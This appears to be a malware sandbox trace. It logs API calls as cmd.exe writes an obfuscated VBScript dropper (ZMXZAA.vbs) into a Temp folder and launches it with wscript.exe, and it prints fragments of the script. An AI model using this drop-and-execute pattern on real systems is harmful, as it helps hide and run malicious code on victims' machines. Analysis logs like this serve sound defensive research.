[0077.902] ReadFile (in: hFile=0x1c, lpBuffer=0x22ed84, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22ed80, lpOverlapped=0x0 | out: lpBuffer=0x22ed84*, lpNumberOfBytesRead=0x22ed80*=0x1, lpOverlapped=0x0) returned 1
[0077.902] GetConsoleTitleW (in: lpConsoleTitle=0x22eba4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.902] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22eb6c | out: _Buffer="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close \r\n") returned 70
[0077.902] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.902] GetFileType (hFile=0x1c) returned 0x1
[0077.902] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.902] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N9nY8xU9gT0oC0bB7aN5wT8qV8rR9bT6yV2iA5oO8eL7rF2jF6mY8zG3fG0i.Close \r\n", lpUsedDefaultChar=0x0) returned 71
[0077.902] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x22eb58, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22eb58*=0x46, lpOverlapped=0x0) returned 1
[0077.903] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.906] _close (_FileHandle=3) returned 0
[0077.906] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.906] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.906] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.906] GetFileType (hFile=0x7) returned 0x2
[0077.906] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.906] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ece0 | out: lpMode=0x22ece0) returned 1
[0077.912] _dup (_FileHandle=1) returned 3
[0077.913] _close (_FileHandle=1) returned 0
[0077.913] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.913] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22ecb0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.913] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.913] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.913] GetFileType (hFile=0x1c) returned 0x1
[0077.913] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x50f
[0077.913] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22ecc8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22ecc8*=0) returned 0x50e
[0077.913] ReadFile (in: hFile=0x1c, lpBuffer=0x22ecc0, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22ecbc, lpOverlapped=0x0 | out: lpBuffer=0x22ecc0*, lpNumberOfBytesRead=0x22ecbc*=0x1, lpOverlapped=0x0) returned 1
[0077.913] GetConsoleTitleW (in: lpConsoleTitle=0x22eae0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.914] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22eaa8 | out: _Buffer="Set nE= Nothing \r\n") returned 19
[0077.914] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.914] GetFileType (hFile=0x1c) returned 0x1
[0077.914] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.914] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Set nE= Nothing \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Set nE= Nothing \r\n", lpUsedDefaultChar=0x0) returned 20
[0077.914] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x22ea94, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22ea94*=0x13, lpOverlapped=0x0) returned 1
[0077.914] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.915] _close (_FileHandle=3) returned 0
[0077.915] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.916] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.916] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.916] GetFileType (hFile=0x7) returned 0x2
[0077.916] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.916] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ec1c | out: lpMode=0x22ec1c) returned 1
[0077.916] _dup (_FileHandle=1) returned 3
[0077.916] _close (_FileHandle=1) returned 0
[0077.917] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.917] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22ebec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.917] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.917] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.917] GetFileType (hFile=0x1c) returned 0x1
[0077.917] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x522
[0077.917] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22ec04*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22ec04*=0) returned 0x521
[0077.917] ReadFile (in: hFile=0x1c, lpBuffer=0x22ebfc, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22ebf8, lpOverlapped=0x0 | out: lpBuffer=0x22ebfc*, lpNumberOfBytesRead=0x22ebf8*=0x1, lpOverlapped=0x0) returned 1
[0077.917] GetConsoleTitleW (in: lpConsoleTitle=0x22ea1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.918] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22e9e4 | out: _Buffer="End If \r\n") returned 10
[0077.918] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.918] GetFileType (hFile=0x1c) returned 0x1
[0077.918] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.918] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="End If \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="End If \r\n", lpUsedDefaultChar=0x0) returned 11
[0077.918] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x22e9d0, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22e9d0*=0xa, lpOverlapped=0x0) returned 1
[0077.918] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.919] _close (_FileHandle=3) returned 0
[0077.919] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.919] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.919] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.919] GetFileType (hFile=0x7) returned 0x2
[0077.920] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.920] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22eb58 | out: lpMode=0x22eb58) returned 1
[0077.920] _dup (_FileHandle=1) returned 3
[0077.920] _close (_FileHandle=1) returned 0
[0077.920] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.921] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22eb28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.921] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.921] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.921] GetFileType (hFile=0x1c) returned 0x1
[0077.921] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x52c
[0077.921] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22eb40*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22eb40*=0) returned 0x52b
[0077.921] ReadFile (in: hFile=0x1c, lpBuffer=0x22eb38, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22eb34, lpOverlapped=0x0 | out: lpBuffer=0x22eb38*, lpNumberOfBytesRead=0x22eb34*=0x1, lpOverlapped=0x0) returned 1
[0077.921] GetConsoleTitleW (in: lpConsoleTitle=0x22e958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.921] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22e920 | out: _Buffer="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing \r\n") returned 45
[0077.921] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.921] GetFileType (hFile=0x1c) returned 0x1
[0077.921] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.921] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Set B8yU2nW4oD3lW4vO1xP2nY9oR3e = Nothing \r\n", lpUsedDefaultChar=0x0) returned 46
[0077.922] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x22e90c, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22e90c*=0x2d, lpOverlapped=0x0) returned 1
[0077.923] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.924] _close (_FileHandle=3) returned 0
[0077.924] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.924] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.924] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.925] GetFileType (hFile=0x7) returned 0x2
[0077.925] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.925] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22ea94 | out: lpMode=0x22ea94) returned 1
[0077.925] _dup (_FileHandle=1) returned 3
[0077.925] _close (_FileHandle=1) returned 0
[0077.926] _wcsicmp (_String1="ZMXZAA.VBs", _String2="con") returned 23
[0077.926] CreateFileW (lpFileName="ZMXZAA.VBs" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22ea64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.926] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.926] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.926] GetFileType (hFile=0x1c) returned 0x1
[0077.926] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x559
[0077.926] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22ea7c*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22ea7c*=0) returned 0x558
[0077.926] ReadFile (in: hFile=0x1c, lpBuffer=0x22ea74, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22ea70, lpOverlapped=0x0 | out: lpBuffer=0x22ea74*, lpNumberOfBytesRead=0x22ea70*=0x1, lpOverlapped=0x0) returned 1
[0077.926] GetConsoleTitleW (in: lpConsoleTitle=0x22e894, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.927] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22e85c | out: _Buffer="WScript.Sleep(5000) \r\n") returned 22
[0077.927] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.927] GetFileType (hFile=0x1c) returned 0x1
[0077.927] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.927] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="WScript.Sleep(5000) \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WScript.Sleep(5000) \r\n", lpUsedDefaultChar=0x0) returned 23
[0077.927] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x22e848, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22e848*=0x16, lpOverlapped=0x0) returned 1
[0077.927] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.928] _close (_FileHandle=3) returned 0
[0077.928] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.928] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.928] _get_osfhandle (_FileHandle=1) returned 0x7
[0077.928] GetFileType (hFile=0x7) returned 0x2
[0077.929] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.929] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22e9d0 | out: lpMode=0x22e9d0) returned 1
[0077.929] _dup (_FileHandle=1) returned 3
[0077.929] _close (_FileHandle=1) returned 0
[0077.930] _wcsicmp (_String1="ZMXZAA.vBS", _String2="con") returned 23
[0077.930] CreateFileW (lpFileName="ZMXZAA.vBS" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\zmxzaa.vbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x22e9a0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c
[0077.930] _open_osfhandle (_OSFileHandle=0x1c, _Flags=8) returned 1
[0077.930] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.930] GetFileType (hFile=0x1c) returned 0x1
[0077.930] GetFileSize (in: hFile=0x1c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x56f
[0077.930] SetFilePointer (in: hFile=0x1c, lDistanceToMove=-1, lpDistanceToMoveHigh=0x22e9b8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x22e9b8*=0) returned 0x56e
[0077.930] ReadFile (in: hFile=0x1c, lpBuffer=0x22e9b0, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x22e9ac, lpOverlapped=0x0 | out: lpBuffer=0x22e9b0*, lpNumberOfBytesRead=0x22e9ac*=0x1, lpOverlapped=0x0) returned 1
[0077.930] GetConsoleTitleW (in: lpConsoleTitle=0x22e7d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.930] _vsnwprintf (in: _Buffer=0x49e14640, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x22e798 | out: _Buffer="H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) \r\n") returned 79
[0077.931] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.931] GetFileType (hFile=0x1c) returned 0x1
[0077.931] _get_osfhandle (_FileHandle=1) returned 0x1c
[0077.931] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) \r\n", cchWideChar=-1, lpMultiByteStr=0x49e06640, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="H2hA8cL7vV6cF1uZ5hR8wN6sP3aV6cG1c.run(R2qL4oI3mN2vD9iQ1sX7cY9oA0fK0hS7dL1w) \r\n", lpUsedDefaultChar=0x0) returned 80
[0077.931] WriteFile (in: hFile=0x1c, lpBuffer=0x49e06640*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x22e784, lpOverlapped=0x0 | out: lpBuffer=0x49e06640*, lpNumberOfBytesWritten=0x22e784*=0x4f, lpOverlapped=0x0) returned 1
[0077.931] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0077.932] _close (_FileHandle=3) returned 0
[0077.932] GetConsoleTitleW (in: lpConsoleTitle=0x22e7d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0077.933] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0077.933] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0077.933] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0077.933] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3aec70, lpFilePart=0x211f68 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp", lpFilePart=0x211f68*="Temp") returned 0x24
[0077.933] SetErrorMode (uMode=0x0) returned 0x1
[0077.933] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0xbf
[0077.933] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
[0077.934] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0077.934] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0077.934] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vbs", fInfoLevelId=0x1, lpFindFileData=0x211d04, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x211d04) returned 0x3aef38
[0077.934] FindClose (in: hFindFile=0x3aef38 | out: hFindFile=0x3aef38) returned 1
[0077.934] _wcsicmp (_String1=".vBS", _String2=".CMD") returned 19
[0077.934] _wcsicmp (_String1=".vBS", _String2=".BAT") returned 20
[0077.934] GetStartupInfoW (in: lpStartupInfo=0x21221c | out: lpStartupInfo=0x21221c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0077.934] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x212310 | out: lpAttributeList=0x0, lpSize=0x212310) returned 0
[0077.934] GetLastError () returned 0x7a
[0077.935] InitializeProcThreadAttributeList (in: lpAttributeList=0x3aef38, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x212310 | out: lpAttributeList=0x3aef38, lpSize=0x212310) returned 1
[0077.935] UpdateProcThreadAttribute (in: lpAttributeList=0x3aef38, dwFlags=0x0, Attribute=0x60001, lpValue=0x2122e8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3aef38, lpPreviousValue=0x0) returned 1
[0077.935] CreateProcessW (in: lpApplicationName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS", lpCommandLine="ZMXZAA.vbs ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2122a0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x7, hStdError=0xb), lpProcessInformation=0x2122f8 | out: lpCommandLine="ZMXZAA.vbs ", lpProcessInformation=0x2122f8*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0
[0077.949] DeleteProcThreadAttributeList (in: lpAttributeList=0x3aef38 | out: lpAttributeList=0x3aef38)
[0077.949] GetLastError () returned 0xc1
[0077.949] GetConsoleWindow () returned 0x20214
[0077.951] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x76b00000
[0077.955] GetProcAddress (hModule=0x76b00000, lpProcName="ShellExecuteExW") returned 0x76b21e46
[0077.955] ShellExecuteExW (in: pExecInfo=0x212260*(cbSize=0x3c, fMask=0x140, hwnd=0x20214, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS", lpParameters=" ", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x212260*(cbSize=0x3c, fMask=0x140, hwnd=0x20214, lpVerb=0x0, lpFile="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS", lpParameters=" ", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x270)) returned 1
[0079.135] CloseHandle (hObject=0x270) returned 1
[0079.135] _get_osfhandle (_FileHandle=1) returned 0x7
[0079.135] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0079.136] _get_osfhandle (_FileHandle=1) returned 0x7
[0079.136] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e041ac | out: lpMode=0x49e041ac) returned 1
[0079.136] _get_osfhandle (_FileHandle=0) returned 0x3
[0079.136] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e041b0 | out: lpMode=0x49e041b0) returned 1
[0079.136] SetConsoleInputExeNameW () returned 0x1
[0079.136] GetConsoleOutputCP () returned 0x1b5
[0079.136] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e04260 | out: lpCPInfo=0x49e04260) returned 1
[0079.136] SetThreadUILanguage (LangId=0x0) returned 0x409
[0079.136] exit (_Code=0)
Thread:
id = 157
os_tid = 0x884
Thread:
id = 158
os_tid = 0x8dc
Thread:
id = 159
os_tid = 0x7dc
Thread:
id = 160
os_tid = 0x490
Process:
id = "8"
image_name = "wscript.exe"
filename = "c:\\windows\\syswow64\\wscript.exe"
page_root = "0x17351000"
os_pid = "0x5a8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "7"
os_parent_pid = "0x488"
cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\ZMXZAA.vBS\" "
cur_dir = "C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1654
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1655
start_va = 0x30000
end_va = 0x31fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1656
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x40000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1657
start_va = 0x50000
end_va = 0x53fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1658
start_va = 0x70000
end_va = 0xaffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 1659
start_va = 0xf0000
end_va = 0x1effff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 1660
start_va = 0x630000
end_va = 0x655fff
entry_point = 0x630000
region_type = mapped_file
name = "wscript.exe"
filename = "\\Windows\\SysWOW64\\wscript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")
Region:
id = 1661
start_va = 0x77c40000
end_va = 0x77de8fff
entry_point = 0x77c40000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1662
start_va = 0x77e20000
end_va = 0x77f9ffff
entry_point = 0x77e20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1663
start_va = 0x7efb0000
end_va = 0x7efd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1664
start_va = 0x7efdb000
end_va = 0x7efddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1665
start_va = 0x7efde000
end_va = 0x7efdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1666
start_va = 0x7efdf000
end_va = 0x7efdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1667
start_va = 0x7efe0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1668
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1669
start_va = 0x7fff0000
end_va = 0x7fffffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1673
start_va = 0x2d0000
end_va = 0x34ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 1674
start_va = 0x752a0000
end_va = 0x752a7fff
entry_point = 0x752a0000
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1675
start_va = 0x752b0000
end_va = 0x7530bfff
entry_point = 0x752b0000
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1676
start_va = 0x75310000
end_va = 0x7534efff
entry_point = 0x75310000
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1677
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1678
start_va = 0x1f0000
end_va = 0x256fff
entry_point = 0x1f0000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1679
start_va = 0x430000
end_va = 0x52ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 1680
start_va = 0x830000
end_va = 0x83ffff
entry_point = 0x0
region_type = private
